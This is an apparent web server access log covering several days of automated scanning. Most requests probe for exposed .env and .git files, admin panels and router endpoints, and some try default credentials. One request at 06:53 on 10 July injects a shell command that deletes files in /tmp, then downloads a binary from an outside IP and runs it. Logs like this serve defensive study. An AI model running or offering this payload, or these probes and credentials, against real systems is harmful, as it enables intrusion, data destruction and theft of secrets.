176.65.148.16 - - [09/Jul/2025:02:23:30 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:02:23:30 +0300] "POST / HTTP/1.1" 400 11 "{}"
176.65.148.16 - - [09/Jul/2025:02:36:49 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:02:36:50 +0300] "POST / HTTP/1.1" 400 11 "{}"
176.65.148.16 - - [09/Jul/2025:02:36:50 +0300] "GET /core/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:02:36:51 +0300] "POST / HTTP/1.1" 400 11 "{}"
176.65.148.16 - - [09/Jul/2025:02:36:51 +0300] "GET /app/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:02:36:52 +0300] "POST / HTTP/1.1" 400 11 "{}"
176.65.148.16 - - [09/Jul/2025:02:36:53 +0300] "GET /public/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:02:36:53 +0300] "POST / HTTP/1.1" 400 11 "{}"
95.214.52.169 - - [09/Jul/2025:02:37:21 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:41:45 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:41:46 +0300] "GET /conf/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:41:46 +0300] "GET /wp-content/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:41:47 +0300] "GET /wp-admin/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:41:48 +0300] "GET /library/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:41:49 +0300] "GET /new/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:41:50 +0300] "GET /vendor/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:41:51 +0300] "GET /old/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:41:52 +0300] "GET /local/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:41:53 +0300] "GET /api/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:41:54 +0300] "GET /blog/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:41:55 +0300] "GET /crm/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:41:56 +0300] "GET /admin/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:41:57 +0300] "GET /laravel/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:41:58 +0300] "GET /app/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:41:58 +0300] "GET /app/config/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:41:59 +0300] "GET /apps/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:42:01 +0300] "GET /audio/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:42:03 +0300] "GET /backend/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:42:03 +0300] "GET /src/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:42:04 +0300] "GET /base/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:42:05 +0300] "GET /core/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:42:06 +0300] "GET /vendor/laravel/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:42:07 +0300] "GET /storage/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:42:08 +0300] "GET /protected/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:42:09 +0300] "GET /newsite/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:42:10 +0300] "GET /www/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:42:12 +0300] "GET /sites/all/libraries/mailchimp/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:42:12 +0300] "GET /database/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:42:14 +0300] "GET /public/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:42:16 +0300] "GET /79-118-64-178.rdsnet.ro/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:42:17 +0300] "GET /vendor/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:42:17 +0300] "GET /storage/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:42:18 +0300] "GET /public/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:42:19 +0300] "GET /api/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:42:20 +0300] "GET /.env.bak HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:42:21 +0300] "GET /backend/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:03:42:22 +0300] "POST / HTTP/1.1" 400 11 "{}"
185.247.137.91 - - [09/Jul/2025:04:54:02 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
45.55.186.92 - - [09/Jul/2025:04:54:03 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [09/Jul/2025:05:05:47 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
159.89.51.93 - - [09/Jul/2025:05:09:43 +0300] "GET /form.html HTTP/1.1" 404 9 "{}"
159.89.51.93 - - [09/Jul/2025:05:09:44 +0300] "GET /t4 HTTP/1.1" 404 9 "{}"
159.89.51.93 - - [09/Jul/2025:05:09:44 +0300] "GET /geoip/ HTTP/1.1" 404 9 "{}"
159.89.51.93 - - [09/Jul/2025:05:09:44 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
91.230.168.104 - - [09/Jul/2025:06:56:49 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:23:45 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:23:46 +0300] "GET /conf/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:23:46 +0300] "GET /wp-content/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:23:47 +0300] "GET /wp-admin/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:23:48 +0300] "GET /library/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:23:49 +0300] "GET /new/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:23:50 +0300] "GET /vendor/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:23:51 +0300] "GET /old/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:23:52 +0300] "GET /local/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:23:53 +0300] "GET /api/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:23:54 +0300] "GET /blog/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:23:54 +0300] "GET /crm/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:23:55 +0300] "GET /admin/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:23:56 +0300] "GET /laravel/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:23:58 +0300] "GET /app/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:23:58 +0300] "GET /app/config/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:24:00 +0300] "GET /apps/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:24:01 +0300] "GET /audio/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:24:03 +0300] "GET /backend/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:24:04 +0300] "GET /src/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:24:05 +0300] "GET /base/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:24:05 +0300] "GET /core/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:24:06 +0300] "GET /vendor/laravel/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:24:07 +0300] "GET /storage/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:24:08 +0300] "GET /protected/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:24:10 +0300] "GET /newsite/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:24:11 +0300] "GET /www/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:24:12 +0300] "GET /sites/all/libraries/mailchimp/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:24:12 +0300] "GET /database/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:24:13 +0300] "GET /public/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:24:19 +0300] "GET /79-118-65-101.rdsnet.ro/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:24:20 +0300] "GET /vendor/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:24:20 +0300] "GET /storage/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:24:21 +0300] "GET /public/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:24:22 +0300] "GET /api/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:24:23 +0300] "GET /.env.bak HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:24:25 +0300] "GET /backend/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [09/Jul/2025:07:24:26 +0300] "POST / HTTP/1.1" 400 11 "{}"
95.214.52.169 - - [09/Jul/2025:07:35:42 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
76.72.238.234 - - [09/Jul/2025:07:54:13 +0300] "GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0" 404 9 "{}"
95.214.53.84 - - [09/Jul/2025:07:57:13 +0300] "GET /login.asp HTTP/1.1" 404 9 "{}"
167.94.138.63 - - [09/Jul/2025:08:09:05 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
167.94.138.63 - - [09/Jul/2025:08:09:09 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
43.139.65.242 - - [09/Jul/2025:09:18:12 +0300] "GET /containers/json HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [09/Jul/2025:10:12:05 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
95.214.53.84 - - [09/Jul/2025:10:15:01 +0300] "GET /userRpmNatDebugRpm26525557/start_art.html HTTP/1.1" 404 9 "{}"
118.193.39.117 - - [09/Jul/2025:10:19:57 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
118.193.39.117 - - [09/Jul/2025:10:19:57 +0300] "GET /sitemap.xml HTTP/1.1" 404 9 "{}"
196.251.70.87 - - [09/Jul/2025:10:28:01 +0300] "GET /.git/index HTTP/1.1" 404 9 "{}"
201.7.170.246 - - [09/Jul/2025:10:52:01 +0300] "GET /admin/assets/css/jquery-ui.css HTTP/1.0" 404 9 "{}"
134.209.249.151 - - [09/Jul/2025:12:37:02 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
134.209.249.151 - - [09/Jul/2025:12:37:02 +0300] "GET /.git/config HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [09/Jul/2025:12:37:10 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
81.29.134.51 - - [09/Jul/2025:12:56:42 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
5.101.64.6 - - [09/Jul/2025:13:33:57 +0300] "GET /aaa9 HTTP/1.1" 404 9 "{}"
5.101.64.6 - - [09/Jul/2025:13:33:59 +0300] "GET /aab9 HTTP/1.1" 404 9 "{}"
112.229.183.30 - - [09/Jul/2025:14:33:32 +0300] "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" 404 9 "{}"
95.214.52.169 - - [09/Jul/2025:15:16:01 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
87.255.194.135 - - [09/Jul/2025:16:07:09 +0300] "GET /admin/assets/css/jquery-ui.css HTTP/1.0" 404 9 "{}"
123.191.147.160 - - [09/Jul/2025:16:19:06 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
183.93.64.34 - - [09/Jul/2025:16:19:07 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [09/Jul/2025:17:50:31 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
104.248.247.45 - - [09/Jul/2025:19:06:22 +0300] "GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0" 404 9 "{}"
104.248.247.45 - - [09/Jul/2025:19:06:29 +0300] "GET /odinhttpcall1752077189 HTTP/1.1" 404 9 "{}"
104.248.247.45 - - [09/Jul/2025:19:06:29 +0300] "POST /sdk HTTP/1.1" 404 9 "{}"
104.248.247.45 - - [09/Jul/2025:19:06:29 +0300] "GET /HNAP1 HTTP/1.1" 404 9 "{}"
104.248.247.45 - - [09/Jul/2025:19:06:29 +0300] "GET /evox/about HTTP/1.1" 404 9 "{}"
161.35.221.104 - - [09/Jul/2025:19:06:29 +0300] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 9 "{}"
159.223.21.86 - - [09/Jul/2025:19:06:29 +0300] "GET /solr/admin/info/system HTTP/1.1" 404 9 "{}"
159.223.21.86 - - [09/Jul/2025:19:06:29 +0300] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 9 "{}"
64.226.110.139 - - [09/Jul/2025:19:06:29 +0300] "GET /v2/_catalog HTTP/1.1" 404 9 "{}"
128.199.144.103 - - [09/Jul/2025:19:06:30 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
128.199.144.103 - - [09/Jul/2025:19:06:31 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
201.7.170.246 - - [09/Jul/2025:19:11:26 +0300] "GET /admin/assets/js/views/login.js HTTP/1.0" 404 9 "{}"
35.246.182.245 - - [09/Jul/2025:19:26:05 +0300] "GET /webpages/index.html HTTP/1.1" 404 9 "{}"
95.214.53.84 - - [09/Jul/2025:19:36:13 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [09/Jul/2025:20:20:12 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
165.227.166.239 - - [09/Jul/2025:20:43:18 +0300] "GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0" 404 9 "{}"
165.227.166.239 - - [09/Jul/2025:20:43:25 +0300] "POST /sdk HTTP/1.1" 404 9 "{}"
165.227.166.239 - - [09/Jul/2025:20:43:25 +0300] "GET /odinhttpcall1752083005 HTTP/1.1" 404 9 "{}"
165.227.166.239 - - [09/Jul/2025:20:43:25 +0300] "GET /HNAP1 HTTP/1.1" 404 9 "{}"
165.227.166.239 - - [09/Jul/2025:20:43:25 +0300] "GET /evox/about HTTP/1.1" 404 9 "{}"
68.183.210.234 - - [09/Jul/2025:20:43:25 +0300] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 9 "{}"
104.248.246.206 - - [09/Jul/2025:20:43:25 +0300] "GET /v2/_catalog HTTP/1.1" 404 9 "{}"
68.183.210.234 - - [09/Jul/2025:20:43:25 +0300] "GET /solr/admin/info/system HTTP/1.1" 404 9 "{}"
68.183.210.234 - - [09/Jul/2025:20:43:25 +0300] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 9 "{}"
143.198.210.126 - - [09/Jul/2025:20:43:26 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
143.198.210.126 - - [09/Jul/2025:20:43:26 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
87.255.194.135 - - [09/Jul/2025:20:53:18 +0300] "GET /admin/assets/js/views/login.js HTTP/1.0" 404 9 "{}"
196.251.70.87 - - [09/Jul/2025:20:55:54 +0300] "GET /_profiler/phpinfo HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [09/Jul/2025:22:51:47 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
165.154.182.179 - - [09/Jul/2025:23:03:43 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
165.154.182.179 - - [09/Jul/2025:23:03:44 +0300] "GET /sitemap.xml HTTP/1.1" 404 9 "{}"
165.154.182.179 - - [09/Jul/2025:23:03:45 +0300] "GET /config.json HTTP/1.1" 404 9 "{}"
162.243.74.60 - - [10/Jul/2025:00:21:04 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
162.243.74.60 - - [10/Jul/2025:00:21:05 +0300] "GET /.git/config HTTP/1.1" 404 9 "{}"
167.94.146.60 - - [10/Jul/2025:00:38:18 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
167.94.146.60 - - [10/Jul/2025:00:38:18 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [10/Jul/2025:01:28:58 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [10/Jul/2025:01:39:41 +0300] "GET /HNAP1/ HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [10/Jul/2025:01:39:41 +0300] "GET /loginMsg.js HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [10/Jul/2025:01:39:43 +0300] "GET /RootDevice.xml HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [10/Jul/2025:01:40:25 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [10/Jul/2025:01:40:25 +0300] "GET /api/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [10/Jul/2025:01:40:25 +0300] "GET /laravel/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [10/Jul/2025:01:40:25 +0300] "GET /public/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [10/Jul/2025:01:40:25 +0300] "GET /backend/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [10/Jul/2025:01:40:25 +0300] "GET /core/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [10/Jul/2025:01:40:25 +0300] "GET /config/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [10/Jul/2025:01:40:25 +0300] "GET /app/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [10/Jul/2025:01:40:25 +0300] "GET /site/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [10/Jul/2025:01:40:25 +0300] "GET /v1/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [10/Jul/2025:01:40:26 +0300] "GET /v2/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [10/Jul/2025:01:40:26 +0300] "GET /admin/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [10/Jul/2025:01:40:26 +0300] "GET /private/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [10/Jul/2025:01:40:26 +0300] "GET /storage/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [10/Jul/2025:01:40:26 +0300] "GET /resources/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [10/Jul/2025:01:40:26 +0300] "GET /src/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [10/Jul/2025:01:40:26 +0300] "GET /server/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [10/Jul/2025:01:40:26 +0300] "GET /deploy/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [10/Jul/2025:01:40:26 +0300] "GET /docker/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [10/Jul/2025:01:40:26 +0300] "GET /database/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [10/Jul/2025:01:40:26 +0300] "GET /tests/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [10/Jul/2025:01:40:26 +0300] "GET /tmp/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [10/Jul/2025:01:40:26 +0300] "GET /var/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [10/Jul/2025:01:40:27 +0300] "GET /web/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [10/Jul/2025:01:40:27 +0300] "GET /wordpress/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [10/Jul/2025:01:40:27 +0300] "GET /wp-content/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [10/Jul/2025:01:40:27 +0300] "GET /wp-admin/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [10/Jul/2025:01:40:27 +0300] "GET /api/v1/.env HTTP/1.1" 404 9 "{}"
176.65.148.16 - - [10/Jul/2025:01:40:27 +0300] "GET /api/v2/.env HTTP/1.1" 404 9 "{}"
35.246.197.59 - - [10/Jul/2025:01:40:35 +0300] "GET /webpages/index.html HTTP/1.1" 404 9 "{}"
89.248.168.227 - - [10/Jul/2025:03:14:56 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
201.7.170.246 - - [10/Jul/2025:03:29:18 +0300] "GET /admin/assets/js/pbxlib.js HTTP/1.0" 404 9 "{}"
95.214.52.169 - - [10/Jul/2025:03:59:05 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
135.237.126.211 - - [10/Jul/2025:06:06:06 +0300] "GET /developmentserver/metadatauploader HTTP/1.1" 404 9 "{}"
87.255.194.135 - - [10/Jul/2025:06:15:28 +0300] "GET /admin/assets/js/pbxlib.js HTTP/1.0" 404 9 "{}"
95.214.52.169 - - [10/Jul/2025:06:29:01 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
125.139.253.185 - - [10/Jul/2025:06:53:17 +0300] "GET /shell?cd+/tmp;rm+-rf+*;wget+38.57.46.116/jaws;sh+/tmp/jaws HTTP/1.1" 404 9 "{}"
13.89.124.219 - - [10/Jul/2025:08:23:00 +0300] "GET /druid/index.html HTTP/1.1" 404 9 "{}"
104.234.115.162 - - [10/Jul/2025:08:58:56 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
65.49.1.200 - - [10/Jul/2025:09:07:48 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
65.49.1.192 - - [10/Jul/2025:09:08:31 +0300] "GET /geoserver/web/ HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [10/Jul/2025:11:41:19 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
107.170.13.32 - - [10/Jul/2025:12:37:17 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
107.170.13.32 - - [10/Jul/2025:12:37:17 +0300] "GET /.git/config HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [10/Jul/2025:14:50:03 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
106.75.13.178 - - [10/Jul/2025:16:24:01 +0300] "GET /version HTTP/1.1" 404 9 "{}"
106.75.13.178 - - [10/Jul/2025:16:24:04 +0300] "GET /v1 HTTP/1.1" 404 9 "{}"
209.38.82.133 - - [10/Jul/2025:16:41:16 +0300] "GET /form.html HTTP/1.1" 404 9 "{}"
209.38.82.133 - - [10/Jul/2025:16:41:17 +0300] "GET /t4 HTTP/1.1" 404 9 "{}"
209.38.82.133 - - [10/Jul/2025:16:41:18 +0300] "GET /geoip/ HTTP/1.1" 404 9 "{}"
209.38.82.133 - - [10/Jul/2025:16:41:19 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [10/Jul/2025:17:25:51 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
185.247.137.253 - - [10/Jul/2025:20:09:37 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
192.241.179.235 - - [10/Jul/2025:20:09:37 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [10/Jul/2025:20:13:25 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
77.83.36.43 - - [10/Jul/2025:20:18:58 +0300] "GET /HNAP1/ HTTP/1.1" 404 9 "{}"
167.94.145.110 - - [10/Jul/2025:20:32:09 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
167.94.145.110 - - [10/Jul/2025:20:32:09 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
20.65.192.101 - - [10/Jul/2025:20:59:43 +0300] "GET /hudson HTTP/1.1" 404 9 "{}"
35.246.182.245 - - [10/Jul/2025:21:10:25 +0300] "GET /webpages/index.html HTTP/1.1" 404 9 "{}"
201.7.170.246 - - [10/Jul/2025:22:04:57 +0300] "GET /admin/assets/css/jquery-ui.css HTTP/1.0" 404 9 "{}"
95.214.52.169 - - [10/Jul/2025:22:50:02 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
185.244.36.140 - - [10/Jul/2025:23:25:46 +0300] "GET /level/15/exec/-/sh/run/CR HTTP/1.1" 404 9 "{}"
20.65.194.164 - - [10/Jul/2025:23:53:19 +0300] "GET /manager/html HTTP/1.1" 404 9 "{}"
87.255.194.135 - - [11/Jul/2025:00:17:34 +0300] "GET /admin/assets/css/jquery-ui.css HTTP/1.0" 404 9 "{}"
137.184.177.34 - - [11/Jul/2025:00:54:04 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [11/Jul/2025:01:20:31 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [11/Jul/2025:01:49:41 +0300] "GET /HNAP1/ HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [11/Jul/2025:01:49:41 +0300] "GET /loginMsg.js HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [11/Jul/2025:01:49:43 +0300] "GET /RootDevice.xml HTTP/1.1" 404 9 "{}"
35.246.182.245 - - [11/Jul/2025:01:50:35 +0300] "GET /webpages/index.html HTTP/1.1" 404 9 "{}"
170.64.177.26 - - [11/Jul/2025:02:28:23 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
170.64.177.26 - - [11/Jul/2025:02:28:24 +0300] "GET /.git/config HTTP/1.1" 404 9 "{}"
78.153.140.151 - - [11/Jul/2025:03:39:04 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
78.153.140.151 - - [11/Jul/2025:03:39:05 +0300] "GET /web/.env\x1a HTTP/1.1" 404 9 "{}"
78.153.140.151 - - [11/Jul/2025:03:39:05 +0300] "GET /support/.env HTTP/1.1" 404 9 "{}"
78.153.140.151 - - [11/Jul/2025:03:39:05 +0300] "GET /web/.env.dev HTTP/1.1" 404 9 "{}"
78.153.140.151 - - [11/Jul/2025:03:39:06 +0300] "GET /web/.env.bak HTTP/1.1" 404 9 "{}"
78.153.140.151 - - [11/Jul/2025:03:39:06 +0300] "GET /settings.env HTTP/1.1" 404 9 "{}"
78.153.140.151 - - [11/Jul/2025:03:39:06 +0300] "GET /stg/.env.dev HTTP/1.1" 404 9 "{}"
78.153.140.151 - - [11/Jul/2025:03:39:06 +0300] "GET /stg/.env.bak HTTP/1.1" 404 9 "{}"
78.153.140.151 - - [11/Jul/2025:03:39:07 +0300] "GET /panel/.env.1 HTTP/1.1" 404 9 "{}"
78.153.140.151 - - [11/Jul/2025:03:39:07 +0300] "GET /panel/.env.2 HTTP/1.1" 404 9 "{}"
78.153.140.151 - - [11/Jul/2025:03:39:08 +0300] "GET /shopify/.env HTTP/1.1" 404 9 "{}"
78.153.140.151 - - [11/Jul/2025:03:39:08 +0300] "GET /yii/env.json HTTP/1.1" 404 9 "{}"
78.153.140.151 - - [11/Jul/2025:03:39:08 +0300] "GET /yii/env.yaml HTTP/1.1" 404 9 "{}"
78.153.140.151 - - [11/Jul/2025:03:39:09 +0300] "GET /preview/.env HTTP/1.1" 404 9 "{}"
78.153.140.151 - - [11/Jul/2025:03:39:09 +0300] "GET /printenv.tmp HTTP/1.1" 404 9 "{}"
78.153.140.151 - - [11/Jul/2025:03:39:09 +0300] "GET /product/.env HTTP/1.1" 404 9 "{}"
78.153.140.151 - - [11/Jul/2025:03:39:10 +0300] "GET /upload/.env~ HTTP/1.1" 404 9 "{}"
78.153.140.151 - - [11/Jul/2025:03:39:10 +0300] "GET /projeto/.env HTTP/1.1" 404 9 "{}"
